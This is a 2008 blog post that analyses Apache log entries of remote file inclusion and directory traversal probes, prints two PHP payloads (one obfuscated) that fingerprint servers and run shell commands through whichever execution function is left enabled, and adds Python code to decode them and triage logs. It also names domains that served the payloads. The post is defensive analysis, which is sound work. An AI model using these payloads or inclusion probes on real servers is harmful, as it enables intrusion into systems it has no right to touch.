If Your Domain is in This Post, You Might Have Been Hacked
May 26th, 2008 | by blank89

Any experienced admin will tell you that it is easy to tell which lines in an HTTP log are hack attempts and which are not. If you don't know, you're about to find out. It is normal to find large amounts of malicious traffic in your log file, and you don't have to worry about most of it, because it is aimed at software you don't even have. It may be of concern to somebody else, though. In this article I'll show you how to find hacking attempts in your Apache log file and walk through some of the exploits and techniques being used.

Let's start with a basic example.
74.94.170.50 - - [10/May/2008:16:34:16 -0700] "GET //loja/includes/include_once.php?include_file=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 - "-" "libwww-perl/5.800"
74.94.170.50 - - [10/May/2008:16:34:16 -0700] "GET //includes/include_once.php?include_file=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 - "-" "libwww-perl/5.800"
189.38.50.24 - - [10/May/2008:16:45:33 -0700] "GET //includes/include_once.php?include_file=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 - "-" "libwww-perl/5.803"
189.38.50.24 - - [10/May/2008:16:45:33 -0700] "GET //loja/includes/include_once.php?include_file=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 - "-" "libwww-perl/5.803"
189.236.5.128 - - [10/May/2008:16:54:06 -0700] "GET //loja/includes/include_once.php?include_file=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 - "-" "libwww-perl/5.803"
189.236.5.128 - - [10/May/2008:16:54:12 -0700] "GET //includes/include_once.php?include_file=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 - "-" "libwww-perl/5.803"
212.116.174.9 - - [10/May/2008:18:55:54 -0700] "GET //includes/include_once.php?include_file=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 - "-" "libwww-perl/5.800"
212.116.174.9 - - [10/May/2008:18:55:54 -0700] "GET //loja/includes/include_once.php?include_file=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 - "-" "libwww-perl/5.800"
Whoa! Have I been hacked?! Nope: every one of these got a 404, because I don't have the script they are asking for. What they are asking for is a remote file inclusion (RFI): the "include_file" parameter is being handed a URL, in the hope that the target script passes it straight to include() and PHP then fetches and executes whatever that URL serves. I'm not sure which piece of software ships "/loja/includes/include_once.php", but it's pretty nasty. Every source address sends the same two paths, which is what an automated scanner running from several compromised hosts looks like, rather than one person switching IP addresses every two attempts. The first address is a Comcast address, the second one resolves to php2a.digiweb.com.br (which is probably hacked), the next one is an Infinitum address. Why they tried the same two exploits several times even though they did not work the first time is beyond me; the scanner evidently isn't reading the status codes. The run of question marks on the end is a standard trick: anything the vulnerable script appends to the include path (".php", a config file name) ends up in the query string of the fetch instead of breaking the URL. What it does tell us is that anje.pt is either hacked, or they posted the exploit as an example in plain text (a very stupid idea). Let's take a look at "www???????????????????????".
<?
/*******************************************\
IRC.ASCNET.BIZ
http://www.asc.sh/
ALBOSS PARADISE aka ASCRIMEZ aka ASCNET aka ASC aka ALBANIAN.SECURITY.CLAN
\*******************************************/
$x16="\147\145t_\143\x75\162r\x65n\x74\137\x75\x73\x65\x72"; // get_current_user
$x17="\x67e\164\x63\x77d"; // getcwd
$x18="\x67e\164e\x6ev"; // getenv
$x19="\x67\145\164\150ostby\x6e\x61\x6de"; // gethostbyname
$x1a="\160hp\137\x75\156\x61\155e"; // php_uname
$x1b="\x70\x68\160\x76\x65\x72s\x69\157\156"; // phpversion
$x1c="\x73y\163\x74\x65\155"; // system
echo "\x41\114\x42\101\x4e\x49A\074b\162\076"; // "ALBANIA<br>"
$x0b = @$x1a(); // php_uname()
$x0c = $x1c(uptime); // system("uptime")
$x0d = $x1c(id); // system("id")
$x0e = @$x17(); // getcwd()
$x0f = $x18("SE\122\x56\x45\122\x5f\123O\106T\x57AR\x45"); // getenv("SERVER_SOFTWARE")
$x10 = $x1b(); // phpversion()
$x11 = $_SERVER['SERVER_NAME'];
$x12 = $x19($x13); // gethostbyname($x13); $x13 is never assigned, a bug in the payload itself, left as-is
$x14 = $x16(); // get_current_user()
$x15 = @PHP_OS;
// The echoes below print the values collected above, labelled
// os:, uname -a:, uptime:, id:, pwd:, user:, phpv:, SoftWare:, ServerName:, ServerAddr:,
// followed by the group tag "UNITED ALBANIANS aka ALBOSS PARADISE<br>".
echo "\157s\x3a\040$x15\x3c\142r\076";
echo "\x75n\141\155\145 -\x61: $x0b\x3c\x62r>";
echo "\x75\160\164\x69\x6d\x65\x3a\x20$x0c\x3c\142\x72\x3e";
echo "\151d\x3a $x0d\x3cb\162\x3e";
echo "\160\167\x64:\040$x0e\x3c\142r\076";
echo "\x75\x73\145\162: $x14<\x62\162>";
echo "p\x68\x70v:\040$x10<b\162>";
echo "\x53\x6fft\x57\x61\162\145\x3a\040$x0f\074\142r\x3e";
echo "\x53\x65r\166\x65\x72\116\x61\155\x65:\x20$x11\x3c\x62r>";
echo "S\145\x72\x76\145r\101\x64\x64\x72\x3a\040$x12<b\x72>";
echo "\x55\116I\x54\x45\x44 \101\114\102\x41\x4eIA\116\x53\040\x61\x6b\x61 \x41\x4c\x42\x4f\x53S\040\120\x41R\101D\111\x53E<b\162>";
exit;
?>
This is a nasty little payload from a group that got their account suspended on their shared host. It is not shellcode and it does not exploit PHP itself: it is ordinary PHP, delivered through a remote file inclusion hole in some PHP application (the "include_file" parameter above), and it only works where the server lets include() fetch URLs (allow_url_fopen on, and on PHP 5.2 and later allow_url_include as well). Every function name is written as octal and hex escapes so that nobody grepping the hosting site for "system" or "php_uname" will find them; decoded, the variables are get_current_user, getcwd, getenv, gethostbyname, php_uname, phpversion and system. The script runs uptime and id through system(), collects the OS, working directory, server software, PHP version and server name, echoes all of it back in the HTTP response and exits, so the scanner learns in one request whether the host is exploitable and what it is. (One slip: $x13 is never assigned, so the "ServerAddr" line doesn't report anything useful.) Writing this takes no skill at all; the obfuscation is the only effort in it. This guy seems to have a video of his botnet on youtube, so it would be safe to assume this was an attempt to make his botnet bigger.
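To see what the escape soup above actually calls without decoding it by hand, here is a small decoder (an added example, not code from this post or from the payload's authors) that interprets PHP double-quoted string escapes, decodes every literal in a snippet, and rewrites calls made through a variable ("$x1c(uptime)") as direct calls ("system(uptime)"). The sample input is a few lines copied from the payload; the list of functions it flags as dangerous is my own choice, not something the payload declares.

```python
import re

# PHP double-quoted string escapes: \ooo (1 to 3 octal digits), \xhh (1 or 2 hex
# digits), the C-style \n \r \t \v \e \f, and \\ \$ \". Any other backslash is
# kept literally, which is what PHP does too.
_ESC_RE = re.compile(r'\\([0-7]{1,3}|x[0-9A-Fa-f]{1,2}|[nrtvef\\$"])')
_SIMPLE = {"n": "\n", "r": "\r", "t": "\t", "v": "\v", "e": "\x1b",
           "f": "\f", "\\": "\\", "$": "$", '"': '"'}

# Double-quoted literals, and  $var = "...";  assignments, in PHP source.
_STR_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
_ASSIGN_RE = re.compile(r'(\$\w+)\s*=\s*"((?:[^"\\]|\\.)*)"\s*;')

# Functions worth flagging once decoded. This set is my own, not from the post.
DANGEROUS = {"system", "exec", "shell_exec", "passthru", "popen", "proc_open",
             "eval", "assert", "preg_replace", "create_function"}


def php_dq_unescape(s):
    """Decode the escape sequences of a PHP double-quoted string body.
    Variable interpolations such as $x15 are left exactly as written."""
    def one(m):
        e = m.group(1)
        if e[0] == "x":
            return chr(int(e[1:], 16))
        if e[0] in "01234567":
            return chr(int(e, 8) & 0xFF)   # PHP wraps \400 around to \000
        return _SIMPLE[e]
    return _ESC_RE.sub(one, s)


def deobfuscate(src):
    """Return (readable_src, names, flagged).

    names maps each variable assigned a string literal to its decoded value;
    readable_src is src with every literal decoded and each call made through
    such a variable ($x1c(...)) rewritten as a direct call (system(...));
    flagged lists the decoded names that are in DANGEROUS.
    """
    names = {var: php_dq_unescape(body) for var, body in _ASSIGN_RE.findall(src)}
    out = _STR_RE.sub(lambda m: '"' + php_dq_unescape(m.group(1)) + '"', src)
    for var, val in names.items():
        if re.fullmatch(r'[A-Za-z_]\w*', val):      # only plain identifiers
            out = out.replace(var + "(", val + "(")
    flagged = sorted(v for v in names.values() if v in DANGEROUS)
    return out, names, flagged


# Sample input: a few lines copied from the payload quoted above.
SAMPLE = r'''$x16="\147\145t_\143\x75\162r\x65n\x74\137\x75\x73\x65\x72";
$x17="\x67e\164\x63\x77d";
$x1a="\160hp\137\x75\156\x61\155e";
$x1c="\x73y\163\x74\x65\155";
echo "\x41\114\x42\101\x4e\x49A\074b\162\076";
$x0b = @$x1a();
$x0c = $x1c(uptime);
echo "\157s\x3a\040$x15\x3c\142r\076";
'''

if __name__ == "__main__":
    readable, names, flagged = deobfuscate(SAMPLE)
    print(readable)
    print("decoded names:", names)
    print("dangerous:", flagged)
```

The decoder only rewrites calls where the decoded value is a bare identifier, so a variable holding "SERVER_SOFTWARE" is decoded in place but never mistaken for a function. Anything the author left as a plain constant, like the bare "uptime" and "id" arguments, stays as written.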
80.93.56.80 - - [12/May/2008:09:03:47 -0700] "GET //clanlite/service/calendrier.php?mois=6&annee=http://root.fileave.com/on.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803"
80.93.56.80 - - [12/May/2008:09:11:46 -0700] "GET //clanlite/service/calendrier.php?mois=6&annee=http://root.fileave.com/on.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803"
68.165.216.146 - - [12/May/2008:09:48:37 -0700] "GET //clanlite/service/calendrier.php?mois=6&annee=http://www.geocities.com/menantikan_dirimu/aid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810"
216.7.32.9 - - [12/May/2008:10:50:17 -0700] "GET /index.php?inject%20http://www.i-promo.info/test.txt? HTTP/1.1" 200 29227 "-" "Microsoft Pocket Internet Explorer/0.6"
216.7.32.9 - - [12/May/2008:10:54:16 -0700] "GET /string/../../../../../../../../etc/passwd HTTP/1.1" 400 - "-" "Microsoft Pocket Internet Explorer/0.6"
The first three lines are the same pattern against a different target, a calendrier.php under /clanlite/, with the URL in the "annee" parameter this time. The last two come from a different tool (note the fake Pocket Internet Explorer user agent): a generic RFI probe against index.php, and a directory traversal attempt at /etc/passwd, which Apache rejected outright with a 400. The 200 on the index.php line only means index.php exists and served its usual page (29227 bytes); it says nothing about whether the "inject" worked, since the payload's output would only show up if index.php passed that parameter to include(). Hmm… Let's take a look at "aid.txt????".
<?
echo "31337<br>"; // marker: a scanner can grep the response for this to confirm the code ran
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = $_SERVER['SERVER_ADDR'];
$os = @PHP_OS;
echo "UNITED ALBANIANS aka ALBOSS PARADISE<br>";
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "SoftWare: $alb5<br>";
echo "PHPV: $alb6<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
$free = disk_free_space($alb4);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free: ".view_size($free)."<br>";
$cmd="id";
$eseguicmd=ex($cmd); // "esegui" is Italian for "execute"
echo $eseguicmd;
// Try each command-execution function in turn, so that blocking one of
// them with disable_functions is not enough to stop it.
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}
}
exit;
?>
It's our friend, ALBOSS PARADISE, again, without the obfuscation this time. This one is straightforward: the same fingerprint as before, plus free disk space, and then the ex() function, which tries exec, shell_exec, system, passthru and finally popen until it finds one the server hasn't disabled, runs "id" through it and echoes the output. Everything goes back in the HTTP response, so whoever is driving the scanner learns both that the host runs their code and which command-execution function survived disable_functions, which is all they need to come back and install something. The delivery is exactly the same as the last one: a different vulnerable script and parameter, same remote file inclusion mechanism.
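Pulling these out of a real access_log by hand doesn't scale, so here is the same triage done in Python, as an added example that is not code from this post: it parses Apache combined-format lines, tags remote file inclusion probes (a URL in the query string), directory traversal and the scanner user agents seen above, collects the hosts the payloads were fetched from, and sets aside any RFI probe that got a 2xx for a manual look. The sample lines are adapted from the entries in this post plus one constructed benign request; the user-agent list and the tag names are my own choices.

```python
import re
from urllib.parse import unquote, urlsplit

# Apache "combined" log format, the format of every entry quoted in this post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A URL smuggled into the query string is the signature of a remote file
# inclusion probe. The trailing '?' the scanners append is deliberately
# excluded so the host can be extracted cleanly.
URL_RE = re.compile(r'(?i)(?:https?|ftp)://[^\s?&"<>]+')

# User agents on the scanner requests in this post. Neither is a real browser;
# a weak signal alone, a strong one next to an RFI or traversal pattern.
SCANNER_UA = ("libwww-perl", "Microsoft Pocket Internet Explorer")


def classify(line):
    """Return (tags, payload_hosts) for one log line.

    tags is a sorted list drawn from {rfi, traversal, scanner-ua, unparseable};
    payload_hosts are the hosts the attacker's PHP would be fetched from.
    """
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable"], []
    path, _, query = m.group("target").partition("?")
    path, query = unquote(path), unquote(query)
    tags, hosts = set(), []
    for url in URL_RE.findall(query):
        tags.add("rfi")
        hosts.append(urlsplit(url).hostname)
    # Climbing out of the document root, e.g. ../../../../etc/passwd.
    if "../" in path or "..\\" in path:
        tags.add("traversal")
    if any(ua in m.group("ua") for ua in SCANNER_UA):
        tags.add("scanner-ua")
    return sorted(tags), hosts


def scan(lines):
    """Summarise a log: per-tag counts, the distinct payload hosts, and the
    RFI probes that got a 2xx. A 2xx does not prove the inclusion worked
    (index.php serving its usual page is still a 200), but those are the
    lines to check by hand, starting with the response size."""
    counts, hosts, review = {}, set(), []
    for line in lines:
        tags, h = classify(line)
        for tag in tags:
            counts[tag] = counts.get(tag, 0) + 1
        hosts.update(h)
        m = LOG_RE.match(line)
        if "rfi" in tags and m.group("status").startswith("2"):
            review.append((m.group("ip"), m.group("target"), m.group("status")))
    return counts, sorted(hosts), review


# Sample input: three entries adapted from the ones quoted in this post (the
# run of '?' shortened) plus one ordinary page view, constructed, to show a
# benign line passing through untagged.
SAMPLE_LOG = [
    '74.94.170.50 - - [10/May/2008:16:34:16 -0700] "GET //loja/includes/include_once.php'
    '?include_file=http://www.anje.pt/www????? HTTP/1.1" 404 - "-" "libwww-perl/5.800"',
    '216.7.32.9 - - [12/May/2008:10:50:17 -0700] "GET /index.php?inject%20http://www.i-promo.info/test.txt?'
    ' HTTP/1.1" 200 29227 "-" "Microsoft Pocket Internet Explorer/0.6"',
    '216.7.32.9 - - [12/May/2008:10:54:16 -0700] "GET /string/../../../../../../../../etc/passwd'
    ' HTTP/1.1" 400 - "-" "Microsoft Pocket Internet Explorer/0.6"',
    '192.0.2.10 - - [12/May/2008:11:00:00 -0700] "GET /index.php?page=about HTTP/1.1" 200 8120'
    ' "http://example.net/" "Mozilla/5.0 (X11; Linux) Firefox/2.0"',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        tags, hosts = classify(line)
        print(tags or ["ok"], hosts, line[:60])
    counts, hosts, review = scan(SAMPLE_LOG)
    print("counts:", counts)
    print("payload hosts:", hosts)
    print("RFI probes with a 2xx, check by hand:", review)
```

To run it over a real log, replace SAMPLE_LOG with the lines of your access_log. The payload host list is the interesting output: each of those domains is serving somebody's PHP, knowingly or not, which is how the list at the end of this post was built.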
To conclude, the payload files used in these attempts were also fetched from:
thoseguysfilms.com, marsbook.co.kr, unduetretoccaate.it, elettrodataservice.it, sans-packing.ru, pattibus.it, winbd.net, northfans.ch, channelnewsperu.com, municipioxii.it, honamfishing.co.kr, i-promo.info, fileave.com, homert.100webspace.net, kaizo.hut2.ru, lcs.cornu.lyc14.ac-caen.fr and gooteo.com
If your domain is on that list, somebody has been serving their payloads from your server, and you've probably been hacked.
Happy Patching!